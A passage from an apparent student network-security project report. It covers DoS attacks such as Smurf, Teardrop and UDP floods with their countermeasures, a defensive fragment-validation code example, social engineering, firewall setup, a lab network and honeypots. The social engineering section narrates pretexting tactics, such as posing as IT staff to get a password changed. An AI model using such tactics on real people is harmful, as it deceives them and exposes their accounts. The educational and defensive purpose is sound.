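    print("still half-open:", sorted(m.half_open))
```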

• UDP Flood Attack

UDP flooding is when the attacker sends garbage packets from UDP port(s) to UDP port(s) on the remote computer. Since UDP is a connectionless protocol (no handshake mechanism), UDP flooding can be very effective and easy to abuse for flood attacks. A common type of UDP flood attack, often referred to as a Pepsi attack, is an attack in which the attacker sends a large number of forged UDP packets to random diagnostic ports on a target host. The CPU time, memory, and bandwidth required to process these packets may cause the target to become unavailable for legitimate users.

Countermeasure: To minimize the risk of a UDP flood attack, disable all unused UDP services on hosts and block the unused UDP ports if you use a firewall to protect your network.

• Ping of Death Attack

An oversized ICMP datagram (size larger than 65,535 bytes) can crash IP devices that were made before 1996 (Windows 95, NT4).

Countermeasure: Modern operating systems and network devices safely disregard these oversized packets. Older systems can usually be updated with a patch.

• Smurf Attack

An attack where a ping request is sent to a broadcast network address with the sending address spoofed, so that many ping replies will come back to the victim and overload the ability of the victim to process the replies. This attack is made possible mostly because of badly configured network devices that respond to ICMP echoes sent to broadcast addresses. The amount of traffic sent by the attacker is multiplied by a factor equal to the number of hosts behind the router that reply to the ICMP echo packets.

Figure 2.11: Smurf Attack

Besides the target system, the intermediate router is also a victim, and thus also the hosts in the bounce site. A similar attack that uses UDP echo packets instead of ICMP echo packets is called a Fraggle attack.

Countermeasure: It is difficult to prevent Smurf attacks entirely because they are made possible by incorrectly configured networks belonging to a third party. The Smurf Amplifier Registry (SAR, http://www.powertech.no/smurf/) and Netscan.org are among several publicly available databases that can be used to configure routers and firewalls to block ICMP traffic from these networks. The Smurf Amplifier Registry (SAR) can be downloaded in Cisco ACL format. If you use Cisco routers, make sure all interfaces are configured with the no ip directed-broadcast command (default since IOS 12.0).

• Teardrop Attack

A normal packet is sent, then a second packet is sent which has a fragmentation offset claiming to be inside the first fragment. This second fragment is too small to even extend outside the first fragment. This may cause an unexpected error condition to occur on the victim host, which can cause a buffer overflow and a possible system crash on many operating systems. [15]

Countermeasure: Today's implementations of the TCP/IP stack safely disregard such invalid packets.
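Added example (not from the report) covering the Ping of Death and Teardrop entries above: the fragment sanity checks a hardened IP stack applies before reassembly, in Python. The fragment lists are constructed, and fragments are modelled as (offset in bytes, length, more-fragments flag).

```python
"""Added example (not part of the report): the fragment sanity checks a
hardened IP stack applies before reassembly, covering both malformed-packet
attacks above. Fragments are modelled as (offset, length, more_fragments)
with offset in bytes; the fragment lists are constructed for the demo."""

MAX_DATAGRAM = 65535  # largest total length an IP datagram may announce


class Reassembler:
    """Collects the fragments of one datagram, discarding inconsistent ones."""

    def __init__(self):
        self.ranges = []    # accepted (start, end) byte ranges, end exclusive
        self.total = None   # datagram length, known once the last fragment arrives
        self.rejected = []  # (fragment, reason)

    def accept(self, frag):
        """Return True and record the fragment, or False with a reason logged."""
        offset, length, more = frag
        start, end = offset, offset + length
        if length <= 0:
            self.rejected.append((frag, "empty fragment"))
            return False
        if end > MAX_DATAGRAM:
            # Ping of death: the reassembled datagram would exceed 65,535 bytes.
            self.rejected.append((frag, f"datagram would exceed {MAX_DATAGRAM} bytes"))
            return False
        for s, e in self.ranges:
            if start < e and s < end:
                # Teardrop: the offset points inside data already received
                # (this includes a fragment lying entirely within an earlier one).
                self.rejected.append((frag, f"overlaps accepted fragment {s}-{e}"))
                return False
        if not more:
            self.total = end
        self.ranges.append((start, end))
        self.ranges.sort()
        return True

    def complete(self):
        """True when the accepted fragments form one gap-free datagram."""
        if self.total is None:
            return False
        pos = 0
        for s, e in self.ranges:
            if s != pos:
                return False
            pos = e
        return pos == self.total


def check_fragments(frags):
    """Feed a fragment list; return (accepted count, rejection reasons, complete)."""
    r = Reassembler()
    accepted = sum(1 for f in frags if r.accept(f))
    return accepted, [reason for _, reason in r.rejected], r.complete()


# Constructed fragment lists (offset, length, more_fragments).
NORMAL = [(0, 1480, True), (1480, 1480, True), (2960, 100, False)]
TEARDROP = [(0, 1480, True), (20, 200, False)]          # second lies inside the first
PING_OF_DEATH = [(0, 1480, True), (65520, 100, False)]  # 65,620 bytes in total

if __name__ == "__main__":
    for name, frags in [("normal", NORMAL), ("teardrop", TEARDROP),
                        ("ping of death", PING_OF_DEATH)]:
        print(name, check_fragments(frags))
```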

2.7.4 Social Engineering

Before an attacker attempts to gain access to a secured system, he must first know certain things about the target system. Although an attacker often uses technology, he may simply try to ask for the information. If the right person asks, he or she will often get it all too easily.

Social engineering is the art of having people do what you want, or give you information on passwords and almost anything, without them knowing they are doing so. Social engineering applies to every aspect of the internet and also to the real world.

This can start with a simple chat in a chat room or a phone call to a business that someone wants to gain access to from the internet without having to hack in. In a business situation of social engineering, the hacker starts doing research on the company, so he will most likely know every department that the company has. He could then try to phone up a department and say he was a member of the IT department and that the passwords are being changed for routine security reasons; then he would tell the user to change his/her password to whatever he wants. He could then simply log on to their system using the new password and he's in.

A social engineering attack usually involves an attacker impersonating a seemingly harmless person to deceive company personnel to obtain information. Obtaining that information may be the actual goal itself, or it may be used to aid the attacker in penetrating a secured system. The information can be a user ID, password, access code or other type of sensitive information, but can also be information that seems harmless to share. A company phoned by a student conducting a survey about which operating systems and software they use may actually be giving valuable information to a malicious attacker. Malevolent competitors and ex-employees who want to settle a score, sabotage a business, or steal a company secret often use social engineering techniques to reach their malicious goals.

Social engineering attacks are often more complicated and require careful preparation, acting and persuasion skills. A social engineer collects bits and pieces of information that will lead him to his goal, typically using his most valuable tool, a phone. Calling a company and bluntly asking for the information may alarm the employee on the other side of the phone and ruin the entire attack before it really got started. So before the attacker can persuade a victim to simply hand out information, he needs to crawl into the skin of someone the victim will gladly give the information to, someone who works in the same company for example. To do that he needs to know the company's lingo, department structure, internal phone numbers, and anything else that will make him an “insider”. Once the attacker talks the talk, knows who to impersonate and who to ask what, it is just a matter of asking the right questions without raising any suspicion to get everything he wants.

Social engineers have found a relatively new way to attempt to obtain sensitive information from naïve people, without having to pay them a visit or call them by phone: email. The attacker sends malicious e-mail messages that seem to be legitimate and even have a valid sender address. The message may contain a link that takes the victim to a website that looks exactly like a site where he or she frequently buys online products with a credit card number. Or the message may seem to have been sent by the IT department, and includes an attachment that is supposedly the latest anti-virus update that must be installed immediately. In reality, the attachment could be a Trojan horse creating a backdoor for the attacker or logging keystrokes that are sent to the attacker by e-mail.

The most important thing in social engineering is building trust. If a hacker builds up some trust with a user then he is going to find it easier to manipulate him to do what he wants.

Countermeasure: Many companies have acknowledged the necessity of technology such as firewalls, intrusion detection systems, and advanced authentication systems to secure their information. However, this technology does not make them less vulnerable to a social engineer. It may actually lead to a false sense of security, which may make them an even easier target. To prevent successful social engineering attacks, security policies must be implemented and enforced. All employees must be informed and trained to recognize and appropriately respond to a potential social engineering attack.

One of the most important policies that should be implemented is verification of requests. Not only the identity of the requestor should be verified, but also the request he or she is making. A simple method to verify the caller's identity is to call the person back at the phone number listed in the company's phone directory. If someone outside the company asks for inside information, he or she should be forwarded to a manager or the Information Security department. When a copier maintenance person enters a building, the receptionist should verify the appointment and ask for an ID.

The best defense against social engineering attacks by e-mail is using certificates for encrypting and signing e-mail messages, allowing a recipient to positively identify the sender.

By following some basic rules and using common sense, most social engineering attacks can be prevented. It is essential to educate employees about these types of attacks and the methods of a social engineer, because in any security system people are really the weakest link.

3. Our Network Design

We now tackle the design part of our FYP, i.e. building our network.

Mr. Ziad Shaaban, from the computer labs, provided our team with 4 Pentium 3 computers (that we will place in Mr. Khaled Joujou's lab). Therefore, we agreed with Mr. Majari that our network will include one Windows and one UNIX workstation, in addition to one Windows and one UNIX server.

3.1 Topology

The network topology refers to its shape, or its layout. The topology defines how nodes are connected to each other and how they communicate [8]. The figure below illustrates the most common network topologies.

Figure 3.1: Network Topologies [8]

As was described in section 1 of this report, the most common topologies businesses use are hierarchical star networks. Therefore, we have decided to use this kind of topology when building our network, since the ultimate goal is to simulate that we are a business firm.

63

Page 64: Faculty of Engineering and Architecture · PDF file2.5 Network Layer Security ... of our FYP, and secure it by ... Figure 1.1: Networking facilitates the access of information [2]

3.2 Securing the Perimeter

The most common way of implementing perimeter security is using firewalls [9]. A large array of firewalls exists today; each brand (and even each model within a brand) focuses on better security for a given networked environment. From a hacker’s perspective, there are numerous targets: routers, switches, hosts, applications, but also the network as a whole (DoS attacks).

Firewalls are hardware devices (though some software firewalls exist) that filter information coming into and going out of a secured network. Firewalls generally use the following methods to do their job [10]:

• Packet filtering - Packets (small chunks of data) are analyzed against a set of filters. Packets that make it through the filters are sent to the requesting system and all others are discarded.

• Proxy service - Information from the Internet is retrieved by the firewall and then sent to the requesting system and vice versa.

• Stateful inspection - A newer method that doesn't examine the contents of each packet but instead compares certain key parts of the packet to a database of trusted information. Information traveling from inside the firewall to the outside is monitored for specific defining characteristics, and then incoming information is compared to these characteristics. If the comparison yields a reasonable match, the information is allowed through. Otherwise it is discarded.

Some common Firewall Filters (for inside-to-outside protection) are [11]:


• IP addresses - For example, if a certain IP address outside the company is reading too many files from a server, the firewall can block all traffic to or from that IP address.

• Domain names - A company might block all access to certain domain names, or allow access only to specific domain names.

• Protocols - A company might set up only one or two machines to handle a specific protocol and ban that protocol on all other machines. Protocols include: IP, TCP, HTTP, FTP, UDP, ICMP, SMTP, SNMP, Telnet…

• Ports - Any server machine makes its services available to the Internet using numbered ports, one for each service that is available on the server. For example, if a server machine is running a Web (HTTP) server and an FTP server, the Web server would typically be available on port 80, and the FTP server would be available on port 21. A company might block port 21 access on all machines but one inside the company.

• Specific words and phrases - This can be anything. The firewall will sniff (search through) each packet of information for an exact match of the text listed in the filter and block any packet containing the word or phrase.

Firewalls can protect, or help protect (with additional hardware and software), against the following threats (outside-to-inside security):

• Remote login - When someone is able to connect to your computer and control it in some form. This can range from being able to view or access your files to actually running programs on your computer.

• Application backdoors - Some programs have special features that allow for remote access. Others contain bugs that provide a backdoor or hidden access, which provides some level of control of the program.

• SMTP session hijacking - SMTP is the most common method of sending e-mail over the Internet. By gaining access to a list of e-mail addresses, a person can send unsolicited junk e-mail (spam) to thousands of users. This is done quite often by redirecting the e-mail through the SMTP server of an unsuspecting host, making the actual sender of the spam difficult to trace.

• Operating system bugs - Like applications, some operating systems have backdoors. Others provide remote access with insufficient security controls or have bugs that an experienced hacker can take advantage of.

• Denial of service - This type of attack is nearly impossible to counter. What happens is that the hacker sends a request to the server to connect to it. When the server responds with an acknowledgement and tries to establish a session, it cannot find the system that made the request. By inundating a server with these unanswerable session requests, a hacker causes the server to slow to a crawl or eventually crash.

• E-mail bombs - An e-mail bomb is usually a personal attack. Someone sends you the same e-mail hundreds or thousands of times until your e-mail system cannot accept any more messages.

• Macros - To simplify complicated procedures, many applications allow you to create a script of commands that the application can run. This script is known as a macro. Hackers have taken advantage of this to create their own macros that, depending on the application, can destroy your data or crash your computer.

• Viruses - Probably the most well-known threat is computer viruses. A virus is a small program that can copy itself to other computers. This way it can spread quickly from one system to the next. Viruses range from harmless messages to erasing all of your data.

• Spam - Typically harmless but always annoying, spam is the electronic equivalent of junk mail. Spam can be dangerous though. Quite often it contains links to Web sites. Be careful of clicking on these because you may accidentally accept a cookie that provides a backdoor to your computer.

• Redirect bombs - Hackers can use ICMP to change (redirect) the path information takes by sending it to a different router. This is one of the ways that a denial of service attack is set up.

• Source routing - In most cases, the path a packet travels over the Internet (or any other network) is determined by the routers along that path. But the source providing the packet can arbitrarily specify the route that the packet should travel. Hackers sometimes take advantage of this to make information appear to come from a trusted source or even from inside the network! Most firewall products disable source routing by default.

It is evident that some of the above attacks are very hard to prevent using only a firewall, and other software/hardware devices are needed [9].


3.3 Our Network

With the 4 computers available, we researched computer stores in the greater Beirut area for firewalls and switches. We found a very interesting product that suits our needs: the Linksys BEFSX41 EtherFast Cable/DSL Firewall Router w/ 4-Port Switch/VPN endpoint.

Basically, this product has a 4-port built-in switch, VPN endpoint, VPN pass-through, firewall and DHCP server functionalities [14].

Its security functionalities are as follows [14]:

• IPSec Pass-Thru

• PPTP Pass-Thru

• SPI (Stateful Packet Inspection)

• DoS (Denial of Service) Attack Detection

• URL Content Filtering

• DMZ

• Cookies Blocking

• Java Blocking

• ActiveX Blocking

• NAT

This product was found at www.pcandparts.com, a Lebanese online computer store, for only $89.00.

The following is an illustration of our network:


4. Installing the Network

At the beginning of the spring semester, the FEA IT Unit provided us with four computers equipped with Pentium 2 processors, each having a 1.5GB hard disk and 64MB of memory. Clearly, these computers’ specifications were not up to today’s standard. We therefore decided to work on Windows 2000 (1 server, 1 workstation) and Fedora Core 3 (also 1 server and 1 workstation).

However, for Windows to work properly, we had to increase the memory of the 2 computers on which we were going to install the Windows OS from 64MB to 256MB (keeping in mind that these were scarce SD-RAMs). Moreover, to avoid problems with hard disk space and stay on the safe side, we replaced all the 1.5GB drives with 3GB drives. In addition, the computer on which we wanted to install the Fedora server had a faulty CD drive, which prompted us to replace it with a new one.

Also, when installing the Fedora Core 3 OS, we had problems with incomplete and very slow installation processes due to the low memory (64MB). Since it was unnecessary to buy additional memory (Fedora 3 works fine on 64MB), we manually unplugged memory from the computers equipped with Windows and used it in the Fedora PCs just for the duration of the installation.

All in all, installing the OS on the four different computers was a lengthy process due to the low specifications and faulty hardware of the PCs we were provided with.


4.1 Plugging the Network and Creating a Domain

Now that our 4 PCs were up and running, it was time to plug them into the Linksys device (firewall/router with 4-port switch), configure the device and create a domain with different users.

4.1.1 Setting Up the Linksys Product

First, we started by defining the IP addresses. The external IP address (i.e. the router IP address) was chosen to be 192.168.1.1 (with a subnet mask of 255.255.255.0). The internal network IP addresses were 192.168.100.100 for the Windows workstation, 192.168.100.101 for the Windows server, 192.168.100.102 for the Fedora workstation and 192.168.100.103 for the Fedora server. Note that NAT (“natting”), which allows multiple computers to share one internet connection, was enabled. At first, we thought that giving IP addresses on the external and internal sides that looked roughly the same would be dangerous. But with the honey-potting options (see section 4.5) this is not a big threat.

As for the firewall security settings, we started by setting them to maximum security. We enabled Stateful Packet Inspection (SPI), as well as filtering of Proxy, Cookies, Java Applets and ActiveX. Also, we blocked anonymous internet requests to enable the router to drop unaccepted TCP requests and ICMP packets from the internet (in our case, from the hackers). Note that this feature can be disabled in case the hackers’ team is unsuccessful in their outside attacks. Another important aspect of firewall security is closing port 113. This port is a service port that most applications do not need. Closing it would prevent intruders from attacking the router through the internet. Again, if the hackers’ team is unsuccessful in attacking us with this feature on, we can open port 113 to help them.

The firewall also has a feature that can restrict internet access (i.e. the device will only work as a simple switch) all the time or during certain periods of time. However, we turned that option off, as a company would ideally have internet access 24 hours a day.

Finally, an important feature that we recommend using in the firewall is the “Log Feature”. The Log screen provides information on all the logged activities. Downloading log viewer software can also enhance this option by generating files to keep a permanent record of the log activities. The option permits the user to:

• Get logs of all incoming and outgoing activities (useful when running a website or FTP server).

• Get system logs, i.e. activities such as warm boots and access to the router-based utility.

• Get access logs, i.e. keep track of all incoming and outgoing activities via the internet (in our case, the hackers’ team will connect on the internet port).

By monitoring those log files regularly, our team can know when the hackers tried to attack our system from the outside, for example by sending packets.

4.1.2 Creating the Domain

We created a Kerberos domain on the Windows 2000 server that we called FYP. Also, as a requirement put forth by Deloitte, we created about 20 user accounts that we distributed in different user groups having different prerogatives and powers. These users were given consistent usernames (e.g. jmoukarzel for Jean Moukarzel) and dictionary-word passwords, at Deloitte’s request, to simulate real-life situations where most employees set easy passwords for their accounts.

4.2 Tightening Security

After setting up the domain and firewall/router settings, the next step is to tighten our network’s security.

4.2.1 Patches on Windows

Installing service packs and patches is really important on Windows 2000. One should always check the Microsoft website for any updates and download the newest patches and service packs to make sure the network is secure. This is precisely what we did, by downloading the patches discussed in section 2.4. Also, in section 4.4, we will see which tool can be used to update security.

4.2.2 Disabling USB ports to Protect Against Flash Drives

Flash drives are small solid-state memory sticks, about the size of a highlighter pen, that can hold anywhere from 1Mb to 1GB of data. They are incredibly lightweight, very portable (some models function as key chains) and compatible with any PC equipped with a USB port and running Windows 2000/XP, Mac OS 9-10X or Linux 2.4.17 (Windows 9x PCs require a one-time driver installation). USB flash drives have fast transfer rates (1Mb/sec), no moving parts, and do not require a separate power source or batteries. Using flash drives is very simple: they just have to be plugged into the USB port of the PC and Windows plug and play will immediately see them as an additional drive. Flash drives hold more data than a floppy, are more portable than ZIP drives and other removable storage devices, and are more convenient (and less fragile) than CD-RW disks. In short, USB flash drives may just be the perfect and most affordable removable storage medium.

Needless to say, USB flash drives are very useful, but they also introduce big threats to a company’s network, such as [18]:

• Viruses: Users can bring in infected documents from home, or take home a business document to an infected PC, update it, and return it to a corporate file server. Unless the company’s antivirus policies are very aggressive and all files stored on the network are actively scanned, flash drives can present a new vector for computer viruses that is nearly impossible to defend against. Most antivirus software operates "reactively" to threats and can only identify viruses that have been previously identified. Therefore, a virus writer could theoretically infect a corporate network by plugging a USB flash drive into any computer and opening the virus file.

• Malicious Software: In addition to viruses, users could bring in unauthorized software or data files from home such as shareware programs, software pranks, MP3 files, video clips and other files that may violate corporate policies. Moreover, a user with bad intentions can bring in spyware or keystroke loggers that could enable him to capture passwords and other sensitive information.

• Data Theft: This includes corporate espionage, i.e. stealing secret and vital data from the company’s server (like client lists, sales forecasts, research data…) in a matter of a few minutes and selling it to competitors, hackers…


A lot of measures can be taken to prevent any misuse of USB flash drives, ranging from soft measures to hard security measures, such as:

• Educating the users: it is important for the users of the network to know the risks that such devices can present. Moreover, a company should establish a policy for taking data out of the office, or bringing files from home.

• Enforce the lock-desktop policy: an essential measure if a user account has access to sensitive data, to prevent any theft of data while the user is away.

• Frequently update antivirus policies and actively scan the network on a regular basis.

• Restrict USB ports on desktops: USB devices cannot be managed using Group Policy in Windows 2000 or XP. However, USB ports can be disabled on all desktops or on desktops that have access to sensitive data. In doing so, the administrator will need to make sure any peripherals in use (such as keyboards, mice, scanners) use legacy ports instead of USB ports. Note that in most corporate networks, printers are assigned to specialized network print servers and may not be an issue. Also, 3rd-party tools such as SecureWave’s SecureNT software (that we highly recommend) can allow businesses to control end-user access to I/O devices (including USB ports).

To disable the use of USB storage devices on a computer running Windows, the following can be done [19]:

1. Open Windows Explorer or My Computer.

2. Navigate to the %SystemRoot%\Inf folder.

3. Right Click the Usbstor.pnf file and choose Properties.


4. Select the Security tab.

5. In the Group or user names list, select the user or group that you wish to deny access to and check/uncheck the Deny box for each option: read, write, read and write…

6. Press OK.

Alternatively, some companies ban access to the E: or X: drive, which is the drive letter assigned when a USB flash drive is accessed. But this method is not recommended as it can be bypassed easily.

4.3 Creating Common and User Files

To simulate a real company, we have created different sorts of folders and files:

• A network shared folder, accessible by any user, with company files (such as Word documents with names, phone numbers…)

• A folder for each user that can only be accessed by the concerned user, with Excel sheets, Word documents, pictures, etc… to simulate a real-life business situation.

One of the main aims of the hackers’ team will be to steal the data in those files, change it, create new fake files, etc… Of course, these files were backed up daily, so in case the hackers delete/edit them, vital company information will not be lost.

4.4 Scanning the Network and Updating Security

A lot of freeware tools, or software tools available in trial versions, can be found on the internet. They are very useful to administrators as they perform network scans and detect vulnerabilities in the network. We have used them whenever possible (i.e. whenever available for free or in a trial version) to enhance our network security.


4.4.1 Linux Tools

• PortSentry: this tool monitors network probes and attacks against the server. It can also be configured to log and counter these probes and attacks. See the appendix for detailed steps.

• CHKROOTKIT: this tool can be downloaded at www.chkrootkit.org. It scans the system for known exploits, Trojan commands, and worms used to compromise a system. Usually, CHKROOTKIT does not perform very well when PortSentry is also being used.

• Nessus: Nessus searches for and localizes vulnerabilities on the system by actively trying to perform known exploits against the system. When vulnerabilities are found, it makes recommendations about upgrades and configuration changes. The software is available at http://nessus.org.

4.4.2 Windows Tools

The main tool we used to scan our Windows server and network domain was GFI LANguard (available in a free 15-day trial version). This program basically scans the network for missing patches, service packs, open ports and other vulnerabilities and recommends solutions to those vulnerabilities. By running LANguard, we were able, for example, to notice that some vital patches for network security were missing.

Also, we have found a useful tool called EventAlarm (available in a free 30-day trial version) that gives messages, or alarms, to the administrator whenever something specified has taken place. For example, the administrator can set EventAlarm to give a message every time a user logs in, or every time a computer in the network crashes or has problems. In this way, monitoring the network can be easier.

4.5 Confusing the Hackers: Honey Pots

4.5.1 What is a Honeypot

Honeypots are a new technology for the network security industry whose value, unlike most security tools designed to defend and protect a computer network, lies in being probed, attacked, or compromised. Honeypots expect no data, so any traffic to or from them is most likely unauthorized activity. There are two general types of honeypots: production and research. Production honeypots are easy to use, capture only limited information, and are used primarily by companies or corporations. Production honeypots are used to protect a network; they directly help secure an organization’s network. Research honeypots are different; they are used to collect information. Research honeypots are complex to deploy and maintain, capture extensive information, and are used primarily by research, military, or government organizations. Neither solution is better than the other; it all depends on what we want to achieve. From now on, we will concentrate on production honeypots, since they are the ones relevant to our FYP, being used for protection purposes, and we will use the word honeypot in the sense of production honeypot.

Honeypots are not limited to solving only one problem; they have a number of different applications. For prevention, honeypots can be used to slow down or stop automated attacks. For example, the honeypot LaBrea Tarpit is used to slow down automated TCP attacks, such as worms. But in general, honeypots are not effective prevention mechanisms. Against human attackers, honeypots can utilize psychological weapons such as deception or discouragement to confuse or stop attacks. Honeypots can also be used to detect unauthorized activity; they excel at this capability due to their advantages. Traditional detection solutions can flood organizations with alerts, yet only a few of the alerts signal valid attacks. Also, many of today's technologies are not designed to detect unknown attacks. Honeypots help resolve both of these problems. Honeypots generate very few alerts, but when they do it is almost certain that something malicious has happened. Honeypots can also detect and capture unknown attacks as well as known attacks. Finally, honeypots can be used to respond to an attack. If an attacker breaks into an organization, and one of the systems he broke into was a honeypot, then information gathered from that system can be used to respond to the break-in. Honeypots can also be used to identify an attacker once he is in an organization’s network. They can operate on any variety of computer systems and just about any type of computer. While most public domain software for setting up a honeypot is written for UNIX, many of these systems have already been ported to Windows. [20]

4.5.2 Classifications of Honeypots

Levels of Interaction

We have already talked about classification based on functionality (production and research honeypots) in the honeypot definition above. In this section, we will classify honeypots by level of interaction. When dealing with honeypots there is a direct correlation between the amount of data that can be collected and the amount of damage that can be done by an attacker. The more information the honeypot is able to collect, the greater the risk, the complexity and the level of interaction. By risk, we mean the chance that an attacker can use the honeypot to harm, attack, or infiltrate other systems or organizations.

Low Interaction Honeypots

A low interaction honeypot is one that is easy to install, configure, deploy, and maintain. Because the attacker can do less than he might with other, higher interaction honeypots, it is less risky to implement. Low interaction honeypots do not allow the attacker access to an operating system from which he might attack other systems, which also significantly reduces risk. Low interaction honeypots are normally production honeypots, as they are used to protect an organization. Since low interaction honeypots restrict an attacker's activity, they are limited in the amount of information they can give about an attacker. The information received from this type of honeypot is usually restricted to the time and date of the attack, the source IP address and source port of the attack, and the destination IP address and destination port of the attack. An example of a low interaction honeypot is BackOfficer Friendly (BOF). BackOfficer Friendly emulates a limited number of services. By limiting the number of services, the attacker is restricted in how much he can interact with the honeypot. BackOfficer Friendly will be discussed in greater detail in the next section. The honeypot allows an attacker to connect to a port and attempt to execute a restricted number of commands, after which the attacker is disconnected.


Figure 4.1: BackOfficer Friendly detecting an unauthorized connection

Medium Interaction Honeypots

Medium interaction honeypots offer attackers more ability to interact than low interaction honeypots, but less than those considered high interaction. They are usually more time-consuming to install and configure as they normally involve a high level of development and customization from an organization. As attackers have an increased ability to interact with this type of honeypot, more caution must be used to ensure that the attacker does not have access to other systems. An example of a medium interaction honeypot would be the use of a jail. This functionality allows an administrator to partition an operating system environment, creating a virtual operating system within a real operating system. The virtual operating system can be controlled by the real operating system, but gives the appearance and feel of a true operating system. The goal is for an attacker to attack and gain access to the jailed environment, so that the attacker's activities can then be heavily monitored or controlled from the real or master operating system. A medium interaction honeypot is more complicated to deploy and comes with a higher risk, increasing the chance that something may go wrong. However, with greater risk comes greater reward; medium interaction honeypots may be configured to allow the administrator to gather information about the types of attacks.

High Interaction Honeypots

High interaction honeypots are most often research honeypots. They are used, at a great amount of risk, to gather large amounts of information about attackers. The goal of a high interaction honeypot is to give the attacker access to a real operating system where nothing is emulated or restricted. High interaction honeypots give users the opportunity to capture the tools, monitor the activity, and even learn how hackers communicate with one another. Since this type of honeypot allows the attacker to interact with a real operating system, there is the possibility that an attacker might use the honeypot to attack other computers. In order to ensure that this does not take place, high interaction honeypots need to be placed within a controlled environment that restricts the ability of a hacker to launch attacks from within. One of the difficulties in maintaining this type of architecture is to not allow the attacker to realize that he is being monitored in a controlled environment. Because of the amount of risk involved and the complexity of their implementation, high-interaction honeypots may be extremely difficult to configure, install, and maintain. Nevertheless, they are the best resource for studying the hacker community as well as for capturing worms and viruses for analysis.


4.5.3 Review of Most Popular Honeypots

Low Interaction

A- BackOfficer Friendly: http://www.nfr.com/products/bof/

B- Specter: http://www.specter.com

C- Honeyd: http://www.citi.umich.edu/u/provos/honeyd/

D- Decoy Server: http://www.recourse.com

High Interaction

E- Honeynets: http://project.honeynet.org/papers/honeynet/

A- BackOfficer Friendly (BOF)

BackOfficer Friendly is a low interaction honeypot developed by NFR Security Inc. that can run on almost any Windows-based platform, including Windows 95 and Windows 98. BackOfficer Friendly was originally created to detect when anyone attempts a Back Orifice scan against a computer. Back Orifice is a remote-control trojan application from which a hacker can, for example, access files on the infected computer, send messages, open and close the CD drive, etc. Much like a computer virus, it is distributed as an embedded program within downloadable shareware utilities and executable greeting card programs. When the user opens the downloaded file, Back Orifice installs itself on the user's machine and allows the attacker complete control of the computer through the Internet connection. BOF has since evolved to detect attempted connections to other services, such as Telnet, FTP, SMTP, POP3 and IMAP2. When BOF receives a connection to one of these services, it fakes replies to the hopeful hacker, wasting the attacker's time and giving us time to stop them from doing other harm. Basically, it pretends to be a Back Orifice server, for example: BackOfficer Friendly gives the attacker false answers that look like they came from Back Orifice, while logging the attacker's IP address and the operations they attempted to perform. So, BackOfficer Friendly is a spoofing server application which notifies whenever someone attempts to remotely control a system.

Figure 4.2- BOF screen capture showing spoofed services

Figure 4.3: BOF warnings


B- Specter

SPECTER is a smart honeypot or deception system. It simulates a complete machine, providing an interesting target to lure hackers away from the production machines. SPECTER offers common Internet services such as SMTP, FTP, POP3, HTTP and TELNET which appear perfectly normal to the attackers but are in fact traps for them to mess around in and leave traces, without even knowing that they are connected to a decoy system which does none of the things it appears to do, but instead logs everything and notifies the appropriate people. Furthermore, SPECTER automatically investigates the attackers while they are still trying to break in. SPECTER provides massive amounts of luring content and it generates luring programs that will leave hidden marks on the attacker's computer. Automated weekly online updates of the honeypot's content and vulnerability databases allow the honeypot to change constantly without user interaction.

Like BOF, Specter is a low interaction honeypot that offers no operating system for the attacker to access. Yet, Specter offers far more functionality, including the ability to monitor more services and to emulate the applications more realistically. Additionally, the system may be configured to emulate vulnerabilities, making it more attractive to hackers, and even to deliver bogus information to a hacker during an attack.

Specter may be configured to have five different "personalities" or characters:

• Open: The system behaves like a badly configured system in terms of security.

• Secure: The system behaves like a well-configured system in terms of security.

• Failing: The system behaves like a machine with various hardware and software problems.

• Strange: The system behaves unpredictably and leaves the intruder wondering what is going on.

• Aggressive: The system communicates as long as necessary to collect information about the attacker, then reveals its true identity by the appropriate means, depending on the kind of connection, and then ends communication. This is very handy to scare intruders away.

These personalities encourage the attacker to continue to interact with the honeypot and therefore increase the amount of information available to the administrator. [21]


Figure 4.4: Specter GUI

C- Honeyd

Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and their personality can be adapted so that they appear to be running certain operating systems. Honeyd enables a single host to claim multiple addresses.

The different TCP personalities are learned from reading an nmap fingerprint file. The configured personality is the operating system that nmap or xprobe will report. Personalities can be annotated to determine whether they allow FIN scans of open ports or to select the preference with which they reassemble fragmented IP packets. Honeyd can be used to create a virtual honeynet or for general network monitoring. It supports the creation of a virtual network topology including dedicated routes and routers. The routes can be attributed with latency and packet loss to make the topology seem more realistic. [22]

D- Decoy Server

By creating a realistic mock network environment, the solution serves as an attack target in order to protect critical areas of the network. As a supplement to security solutions such as firewalls, it employs advanced decoy technology to enable early warning and detection, and to divert and confine attacks. Symantec Decoy Server sensors deliver detection and response and provide detailed information through their system of data collection modules. Every action is recorded for analysis, allowing administrators to understand the threat and implement an appropriate, policy-based response. Advanced filters enable the solution to automatically discard insignificant events, leaving only the data required to respond effectively to any incident. Decoy Server creates a jailed environment in which attackers have access to virtual cages as opposed to limited operating systems. The cages are controlled environments from which the attacker is unable to escape. Decoy Server is able to create up to four of these cages on a single system. Being a high interaction honeypot, Decoy Server is able to capture much more information about attacks, but, as mentioned earlier, this comes with an increased risk. The greatest risk is that, once attacked, the system will be used to attack other systems. Another risk is the complexity of administering the Decoy Server. Errors made in the configuration process or during system maintenance increase the chance that something may go wrong during implementation. Of course, the greatest concern is that the attacker may be able to capitalize on an error made by the administrator or compromise the system to such a degree that they are able to attack the host operating system. [23]

Figure 4.5: A possible deployment of Decoy Server.

E- Honeynets

A honeynet is a type of honeypot which has high interaction and is designed primarily for research. It is through this extensive interaction that we gain information on threats, both external and internal to an organization. What makes a honeynet different from most honeypots is that it is an entire network of systems. Instead of a single computer, a honeynet is a network of systems designed for attackers to interact with. These victim systems (honeypots within the honeynet) can be any type of system, service, or information we want to provide. It is this flexibility that gives honeynets their true power.


The common elements of a honeynet are:

• A firewall computer: logs all incoming/outgoing connections and provides NAT (network address translation) service and some Denial of Service protection.

• An intrusion detection (IDS) computer: the IDS is sometimes on the same box as the firewall, but it should be on an entirely separate computer that can see all of the network traffic. It also logs all the network traffic and looks for known exploits and attacks.

• A remote system log computer: the honeypot is slightly modified so that all commands an intruder would use are sent to the system log. The system log is then set to log remotely to the remote system log box.

• The honeypot itself: the honeypot can be anything from a default Red Hat 6.2 installation to a mirror of one of our production systems.

One of the unique features of a honeynet is that, rather than emulating a single system like BOF and Specter or multiple systems like Honeyd and Decoy Server, it is actually a network of standard production systems. The systems are put behind some type of access control device and monitored for activity.


Figure 4.6: Honeynet architecture

